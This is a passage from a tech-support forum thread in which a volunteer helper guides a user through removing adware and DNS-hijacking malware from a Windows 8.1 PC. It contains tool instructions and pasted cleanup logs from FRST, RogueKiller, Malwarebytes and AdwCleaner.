    C:\Windows\System32\Tasks\IBUpd2 => moved successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\IBUpd2" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{75F57505-E997-49EF-8280-CBEDA94B26CE}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{75F57505-E997-49EF-8280-CBEDA94B26CE}" => key removed successfully
    C:\Windows\System32\Tasks\Seventh => moved successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Seventh" => key removed successfully
    C:\Users\hersheychoco9\AppData\Roaming\Seventh => moved successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{82DB69B4-7124-4705-AFC2-219F5EBB3241}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{82DB69B4-7124-4705-AFC2-219F5EBB3241}" => key removed successfully
    C:\Windows\System32\Tasks\{0F0F7D47-7E08-7D0B-7811-7D0C050B110D} => moved successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{0F0F7D47-7E08-7D0B-7811-7D0C050B110D}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{86B9E75F-1889-49B5-B36A-35C70EC3D395}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{86B9E75F-1889-49B5-B36A-35C70EC3D395}" => key removed successfully
    C:\Windows\System32\Tasks\Pool Component2 => moved successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Pool Component2" => key removed successfully
    C:\Users\hersheychoco9\AppData\Local\Pool Component\{118F9E4E-9E23-FEE4-DA4B-E734A04928EF}\untjptlj.dll => moved successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{9CCB0C95-9CC9-4F2E-8D83-663775D82970}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9CCB0C95-9CC9-4F2E-8D83-663775D82970}" => key removed successfully
    C:\Windows\System32\Tasks\LaunchPreSignup => moved successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\LaunchPreSignup" => key removed successfully
    "C:\Program Files (x86)\OLBPre" => not found.
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{B1D873D1-5121-42A0-9C92-76FBCD27335F}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B1D873D1-5121-42A0-9C92-76FBCD27335F}" => key removed successfully
    C:\Windows\System32\Tasks\Sixth => moved successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Sixth" => key removed successfully
    C:\Users\hersheychoco9\AppData\Roaming\Sixth => moved successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CBDF6C7E-6032-4090-8BEC-C5ACB6DAA611}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CBDF6C7E-6032-4090-8BEC-C5ACB6DAA611}" => key removed successfully
    C:\Windows\System32\Tasks\Ijufcyl => moved successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Ijufcyl" => key removed successfully
    "C:\PROGRA~1\SHOPPE~1" => not found.
    "C:\PROGRA~1\SHOPPE~1\Osifch.bat" => not found.
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D07CC060-B787-4C15-B547-123801C27E3B}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D07CC060-B787-4C15-B547-123801C27E3B}" => key removed successfully
    C:\Windows\System32\Tasks\Only-search Updater => moved successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Only-search Updater" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{80FA20B2-A979-4EAB-9EBA-6D46F57955A1}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{80FA20B2-A979-4EAB-9EBA-6D46F57955A1}" => key removed successfully
    C:\Windows\System32\Tasks\Genius => moved successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Genius" => key removed successfully
    C:\Users\hersheychoco9\AppData\Roaming\Genius => moved successfully

    ==== End of Fixlog 20:30:16 ====
     
  14. hersheychoco

    hersheychoco TS Rookie Topic Starter Posts: 30

    I was able to uninstall Pool Component but couldn't find the Setup one.
     
  15. Broni

    Broni Malware Annihilator Posts: 52,904   +344

    After restart see if you can connect.
     
  16. hersheychoco

    hersheychoco TS Rookie Topic Starter Posts: 30

    THANK YOU SO MUCH! YOU'RE A LIFE SAVER!!!!!!(y):):)
     
  17. Broni

    Broni Malware Annihilator Posts: 52,904   +344

    We're not done but I'm glad to hear good news :)

    Download RogueKiller from one of the following links and save it to your Desktop:

    Link 1
    Link 2
    • Close all the running programs
    • Windows Vista/7/8 users: right click on RogueKiller.exe, click Run as Administrator
    • Otherwise just double-click on RogueKiller.exe
    • Pre-scan will start. Let it finish.
    • Click on SCAN button.
    • Wait until the Status box shows Scan Finished
    • Click on Delete.
    • Wait until the Status box shows Deleting Finished.
    • Click on Report and copy/paste the content of the Notepad into your next reply.
    • RKreport.txt could also be found on your desktop.
    • If more than one log is produced post all logs.
    • If RogueKiller has been blocked, do not hesitate to try a few times more. If it really won't run, rename it to winlogon.exe (or winlogon.com) and try again.
    Please download Malwarebytes Anti-Malware (MBAM) to your desktop.
    NOTE. If you already have MBAM 2.0 installed scroll down.
    • Double-click mbam-setup-2.0.0.1000.exe and follow the prompts to install the program.
    • At the end, be sure a checkmark is placed next to the following:
    • Launch Malwarebytes Anti-Malware
    • A 14 day trial of the Premium features is pre-selected. You may deselect this if you wish, and it will not diminish the scanning and removal capabilities of the program.
    • Click Finish.
    • On the Dashboard, click the 'Update Now >>' link
    • After the update completes, click the 'Scan Now >>' button.
    • Or, on the Dashboard, click the Scan Now >> button.
    • If an update is available, click the Update Now button.
    • A Threat Scan will begin.
    • When the scan is complete, if there have been detections, click Apply Actions to allow MBAM to clean what was detected.
    • In most cases, a restart will be required.
    • Wait for the prompt to restart the computer to appear, then click on Yes.
    If you already have MBAM 2.0 installed:
    • On the Dashboard, click the 'Update Now >>' link
    • After the update completes, click the 'Scan Now >>' button.
    • Or, on the Dashboard, click the Scan Now >> button.
    • If an update is available, click the Update Now button.
    • A Threat Scan will begin.
    • When the scan is complete, if there have been detections, click Apply Actions to allow MBAM to clean what was detected.
    • In most cases, a restart will be required.
    • Wait for the prompt to restart the computer to appear, then click on Yes.
    How to get logs:
    (Export log to save as txt)
    • After the restart once you are back at your desktop, open MBAM once more.
    • Click on the History tab > Application Logs.
    • Double click on the Scan Log which shows the Date and time of the scan just performed.
    • Click 'Export'.
    • Click 'Text file (*.txt)'
    • In the Save File dialog box which appears, click on Desktop.
    • In the File name: box type a name for your scan log.
    • A message box named 'File Saved' should appear stating "Your file has been successfully exported".
    • Click Ok
    • Attach that saved log to your next reply.
    (Copy to clipboard for pasting into forum replies or tickets)
    • After the restart once you are back at your desktop, open MBAM once more.
    • Click on the History tab > Application Logs.
    • Double click on the Scan Log which shows the Date and time of the scan just performed.
    • Click 'Copy to Clipboard'
    • Paste the contents of the clipboard into your reply.
    Please download AdwCleaner by Xplode onto your desktop.
    • Close all open programs and internet browsers.
    • Double click on adwcleaner.exe to run the tool.
    • Click on Scan button.
    • When the scan has finished click on Clean button.
    • Your computer will be rebooted automatically. A text file will open after the restart.
    • Please post the contents of that logfile with your next reply.
    • You can find the logfile at C:\AdwCleaner[S1].txt as well.
    Please download Junkware Removal Tool to your desktop.
    • Shut down your protection software now to avoid potential conflicts.
    • Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
    • The tool will open and start scanning your system.
    • Please be patient as this can take a while to complete depending on your system's specifications.
    • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
    • Post the contents of JRT.txt into your next message.
     
  18. hersheychoco

    hersheychoco TS Rookie Topic Starter Posts: 30

    RogueKiller V11.0.6.0 [Jan 4 2016] (Free) by Adlice Software
    mail : http://www.adlice.com/contact/
    Feedback : http://forum.adlice.com
    Website : http://www.adlice.com/software/roguekiller/
    Blog : http://www.adlice.com

    Operating System : Windows 8.1 (6.3.9600) 64 bits version
    Started in : Normal mode
    User : hersheychoco9 [Administrator]
    Started from : C:\Users\hersheychoco9\Downloads\RogueKiller.exe
    Mode : Delete -- Date : 01/05/2016 21:12:49

    ¤¤¤ Processes : 0 ¤¤¤

    ¤¤¤ Registry : 18 ¤¤¤
    [PUP] (X86) HKEY_LOCAL_MACHINE\Software\DAILYPCCLEAN -> Not selected
    [PUP] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{10921475-03CE-4E04-90CE-E2E7EF20C814} (C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallExplorer64.dll) -> Not selected
    [PUP] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run | WeatherBug : C:\Program Files\Earth Networks\WeatherBug\WeatherBug.exe [x] -> Not selected
    [PUP] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run | WeatherBug : C:\Program Files\Earth Networks\WeatherBug\WeatherBug.exe [x] -> Not selected
    [PUP] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run | WeatherBug : C:\Program Files\Earth Networks\WeatherBug\WeatherBug.exe [x] -> Not selected
    [PUP] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run | WeatherBug : C:\Program Files\Earth Networks\WeatherBug\WeatherBug.exe [x] -> Not selected
    [PUM.SearchPage] (X64) HKEY_USERS\S-1-5-21-1030869394-3123877279-975090705-1001\Software\Microsoft\Internet Explorer\Main | Search Bar : Preserve -> Not selected
    [PUM.SearchPage] (X86) HKEY_USERS\S-1-5-21-1030869394-3123877279-975090705-1001\Software\Microsoft\Internet Explorer\Main | Search Bar : Preserve -> Not selected
    [PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{8718928D-CBEB-45EA-A621-800A9249001D} | NameServer : 208.87.151.17,208.87.151.16 ([-][]) -> Not selected
    [PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{8D32E4AD-6D5F-4475-9B56-EA1EDF88081D} | NameServer : 208.87.151.17,208.87.151.16 ([-][]) -> Not selected
    [PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{9D26E07C-D4C8-4B1E-B9E8-A0AF8D2D2A78} | NameServer : 208.87.151.17,208.87.151.16 ([-][]) -> Not selected
    [PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{EF083E6B-E699-4F22-B8D6-6AFFF4638C72} | NameServer : 208.87.151.17,208.87.151.16 ([-][]) -> Not selected
    [PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{FE2B955A-7119-470B-99F7-D23E3FE58734} | NameServer : 208.87.151.17,208.87.151.16 ([-][]) -> Not selected
    [PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{8718928D-CBEB-45EA-A621-800A9249001D} | NameServer : 208.87.151.17,208.87.151.16 ([-][]) -> Not selected
    [PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{8D32E4AD-6D5F-4475-9B56-EA1EDF88081D} | NameServer : 208.87.151.17,208.87.151.16 ([-][]) -> Not selected
    [PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{9D26E07C-D4C8-4B1E-B9E8-A0AF8D2D2A78} | NameServer : 208.87.151.17,208.87.151.16 ([-][]) -> Not selected
    [PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{EF083E6B-E699-4F22-B8D6-6AFFF4638C72} | NameServer : 208.87.151.17,208.87.151.16 ([-][]) -> Not selected
    [PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{FE2B955A-7119-470B-99F7-D23E3FE58734} | NameServer : 208.87.151.17,208.87.151.16 ([-][]) -> Not selected

    ¤¤¤ Tasks : 2 ¤¤¤
    [PUP] \Easy Driver Pro Schedule -- "C:\Program Files (x86)\Probit Software\Easy Driver Pro\EDPTray.exe" -> Not selected
    [PUP] \SushiLeads -- C:\Program Files (x86)\sushileads\ScheduledTask.exe -> Not selected

    ¤¤¤ Files : 12 ¤¤¤
    [PUP][Folder] C:\Users\hersheychoco9\AppData\Roaming\WTools -> Deleted
    [Hj.Name][File] C:\ProgramData\Roboscan\Roboscan\sysbackup\explorer.exe -> ERROR [5]
    [Hj.Name][File] C:\ProgramData\Roboscan\Roboscan\sysbackup\userinit.exe -> ERROR [5]
    [Hj.Name][File] C:\ProgramData\Roboscan\Roboscan\sysbackup\winlogon.exe -> ERROR [5]
    [PUP][Folder] C:\ProgramData\{BAF091CA-86C4-4627-ADA1-897E2621C1B0} -> Deleted
    [PUP][Folder] C:\Program Files (x86)\4C4C4544-1451365214-3310-8034-C4C04F343032 -> Deleted
    [PUP][File] C:\Program Files (x86)\4C4C4544-1451365214-3310-8034-C4C04F343032\Uninstall.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\4C4C4544-1451365214-3310-8034-C4C04F343032\vnsg3AF.tmp -> Deleted
    [PUP][Folder] C:\Program Files (x86)\4C4C4544-1451365457-3310-8034-C4C04F343032 -> Deleted
    [PUP][File] C:\Program Files (x86)\4C4C4544-1451365457-3310-8034-C4C04F343032\Uninstall.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\4C4C4544-1451365457-3310-8034-C4C04F343032\vnsvBA11.tmp -> Deleted
    [PUP][Folder] C:\Program Files (x86)\4C4C4544-1451366851-3310-8034-C4C04F343032 -> Deleted
    [PUP][File] C:\Program Files (x86)\4C4C4544-1451366851-3310-8034-C4C04F343032\Uninstall.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\4C4C4544-1451366851-3310-8034-C4C04F343032\vnskFE9C.tmp -> Deleted
    [PUP][Folder] C:\Program Files (x86)\onlysearch -> Deleted
    [PUP][Folder] C:\Program Files (x86)\onlysearch\onlysearch\1.4.2.4 -> Deleted
    [PUP][File] C:\Program Files (x86)\onlysearch\onlysearch\updt.js -> Deleted
    [PUP][Folder] C:\Program Files (x86)\onlysearch\onlysearch -> Deleted
    [PUP][Folder] C:\Program Files (x86)\Probit Software -> Deleted
    [PUP][Folder] C:\Program Files (x86)\Super Optimizer -> Deleted
    [PUP][File] C:\Program Files (x86)\Super Optimizer\SupOptStart.exe -> Deleted
    [PUP][Folder] C:\Program Files (x86)\sushileads -> Deleted
    [PUP][File] C:\Program Files (x86)\sushileads\AppResources.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\sushileads\Common.Logging.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\sushileads\HtmlAgilityPack.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\sushileads\Microsoft.Win32.TaskScheduler.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\sushileads\Newtonsoft.Json.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\sushileads\NpUpdaterService.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\sushileads\Quartz.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\sushileads\RestSharp.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\sushileads\SushiLeadsApplication.exe -> Deleted

    ¤¤¤ Hosts File : 0 ¤¤¤

    ¤¤¤ Antirootkit : 0 (Driver: Not loaded [0xc000036b]) ¤¤¤

    ¤¤¤ Web browsers : 0 ¤¤¤

    ¤¤¤ MBR Check : ¤¤¤
    +++++ PhysicalDrive0: ST1000LM024 HN-M101MBB +++++
    --- User ---
    [MBR] ac549645ac34136e1ed8d1039e17d487
    [BSP] b481a814b9dfd05236432bf6c92742d1 : Empty|VT.Unknown MBR Code
    Partition table:
    0 - [MAN-MOUNT] EFI system partition | Offset (sectors): 2048 | Size: 500 MB
    1 - [SYSTEM][MAN-MOUNT] Basic data partition | Offset (sectors): 1026048 | Size: 40 MB
    2 - [MAN-MOUNT] Microsoft reserved partition | Offset (sectors): 1107968 | Size: 128 MB
    3 - [SYSTEM][MAN-MOUNT] Basic data partition | Offset (sectors): 1370112 | Size: 750 MB
    4 - Basic data partition | Offset (sectors): 2906112 | Size: 942158 MB
    5 - [SYSTEM][MAN-MOUNT] Microsoft recovery partition | Offset (sectors): 1932445696 | Size: 10291 MB
    User = LL1 ... OK
    User = LL2 ... OK
     
  19. hersheychoco

    hersheychoco TS Rookie Topic Starter Posts: 30

    I can't find the RKreport.txt file
     
  20. Broni

    Broni Malware Annihilator Posts: 52,904   +344

    You just posted it.
     
  21. hersheychoco

    hersheychoco TS Rookie Topic Starter Posts: 30

    Oh lol okay I thought there were two different txt files due to the name XD
     
  22. hersheychoco

    hersheychoco TS Rookie Topic Starter Posts: 30

    Here's the scanned log
    it says paste or attached so I don't know..

    File:
    Malwarebytes Anti-Malware
    www.malwarebytes.org

    Scan Date: 1/5/2016
    Scan Time: 9:26 PM
    Logfile: Scannedlog2016.txt
    Administrator: Yes

    Version: 2.2.0.1024
    Malware Database: v2016.01.06.01
    Rootkit Database: v2016.01.05.01
    License: Free
    Malware Protection: Disabled
    Malicious Website Protection: Disabled
    Self-protection: Disabled

    OS: Windows 8.1
    CPU: x64
    File System: NTFS
    User: hersheychoco9

    Scan Type: Threat Scan
    Result: Completed
    Objects Scanned: 387326
    Time Elapsed: 13 min, 17 sec

    Memory: Enabled
    Startup: Enabled
    Filesystem: Enabled
    Archives: Enabled
    Rootkits: Disabled
    Heuristics: Enabled
    PUP: Enabled
    PUM: Enabled

    Processes: 0
    (No malicious items detected)

    Modules: 0
    (No malicious items detected)

    Registry Keys: 0
    (No malicious items detected)

    Registry Values: 0
    (No malicious items detected)

    Registry Data: 0
    (No malicious items detected)

    Folders: 0
    (No malicious items detected)

    Files: 0
    (No malicious items detected)

    Physical Sectors: 0
    (No malicious items detected)


    (end)
     
    Last edited: Jan 5, 2016
  23. Broni

    Broni Malware Annihilator Posts: 52,904   +344

    Always paste.
     
  24. hersheychoco

    hersheychoco TS Rookie Topic Starter Posts: 30

    Okay, running the last two tools now.
     
  25. hersheychoco

    hersheychoco TS Rookie Topic Starter Posts: 30

    # AdwCleaner v5.028 - Logfile created 05/01/2016 at 21:59:40
    # Updated 04/01/2016 by Xplode
    # Database : 2016-01-04.2 [Server]
    # Operating system : Windows 8.1 (x64)
    # Username : hersheychoco9 - CHOCOYAUTJA
    # Running from : C:\Users\hersheychoco9\Desktop\adwcleaner_5.028.exe
    # Option : Cleaning
    # Support : http://toolslib.net/forum

    ***** [ Services ] *****


    ***** [ Folders ] *****

    [-] Folder Deleted : C:\Program Files\WajaNetEn
    [-] Folder Deleted : C:\Users\hersheychoco9\AppData\Local\YSearchUtil
    [-] Folder Deleted : C:\Users\hersheychoco9\AppData\Roaming\Common\LuaRT
    [-] Folder Deleted : C:\Users\hersheychoco9\AppData\Roaming\Store
    [-] Folder Deleted : C:\Users\hersheychoco9\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ASPackage
    [-] Folder Deleted : C:\Users\hersheychoco9\Documents\Probit Software
    [-] Folder Deleted : C:\Windows\Update Pro
    [-] Folder Deleted : C:\Windows\SysWOW64\config\systemprofile\AppData\Local\StormWarnings
    [-] Folder Deleted : C:\Windows\SysWOW64\config\systemprofile\AppData\Local\YSearchUtil
    [-] Folder Deleted : C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\StormWarnings
    [-] Folder Deleted : C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\DhcpUpdater

    ***** [ Files ] *****


    ***** [ DLLs ] *****


    ***** [ Shortcuts ] *****


    ***** [ Scheduled tasks ] *****

    [-] Task Deleted : Genius_Interval

    ***** [ Registry ] *****

    [-] Value Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION [WindoWeather.exe]
    [-] Key Deleted : HKLM\SOFTWARE\bba161f9-9f31-0676-ab03-19d4f658b1c8
    [-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{1AA60054-57D9-4F99-9A55-D0FBFBE7ECD3}
    [-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{6E993643-8FBC-44FE-BC85-D318495C4D96}
    [-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{A43DE495-3D00-47D4-9D2C-303115707939}
    [-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{14EF423E-3EE8-44AE-9337-07AC3F27B744}
    [-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{10921475-03CE-4E04-90CE-E2E7EF20C814}
    [-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{10921475-03CE-4E04-90CE-E2E7EF20C814}
    [-] Value Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID [{79F768ED-0B12-42EF-8257-36751A0ECF3A}]
    [-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{10921475-03CE-4E04-90CE-E2E7EF20C814}
    [-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{A9582D7B-F24A-441D-9D26-450D58F3CD17}
    [-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{EE0D8859-2ED4-4B0D-9812-16865B9AFD65}
    [-] Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{10921475-03CE-4E04-90CE-E2E7EF20C814}
    [-] Key Deleted : HKCU\Software\APN PIP
    [-] Key Deleted : HKCU\Software\Store
    [-] Key Deleted : HKCU\Software\WTools
    [-] Key Deleted : HKCU\Software\Probit Software
    [-] Key Deleted : HKCU\Software\Yahoo\Companion
    [-] Key Deleted : HKCU\Software\Microsoft\Tinstalls
    [-] Key Deleted : HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
    [-] Key Deleted : HKLM\SOFTWARE\NpApp
    [-] Key Deleted : HKLM\SOFTWARE\SmartDNS
    [-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{8718928D-CBEB-45EA-A621-800A9249001D} [NameServer]
    [-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{8D32E4AD-6D5F-4475-9B56-EA1EDF88081D} [NameServer]
    [-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{9D26E07C-D4C8-4B1E-B9E8-A0AF8D2D2A78} [NameServer]
    [-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{EF083E6B-E699-4F22-B8D6-6AFFF4638C72} [NameServer]
    [-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{FE2B955A-7119-470B-99F7-D23E3FE58734} [NameServer]
    [-] Data Restored : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{8718928D-CBEB-45EA-A621-800A9249001D} [NameServer]
    [-] Data Restored : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{8D32E4AD-6D5F-4475-9B56-EA1EDF88081D} [NameServer]
    [-] Data Restored : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{9D26E07C-D4C8-4B1E-B9E8-A0AF8D2D2A78} [NameServer]
    [-] Data Restored : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{EF083E6B-E699-4F22-B8D6-6AFFF4638C72} [NameServer]
    [-] Data Restored : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{FE2B955A-7119-470B-99F7-D23E3FE58734} [NameServer]

    ***** [ Web browsers ] *****


    *************************

    :: "Tracing" keys removed
    :: Winsock settings cleared

    ########## EOF - C:\AdwCleaner\AdwCleaner[C1].txt - [4679 bytes] ##########
     
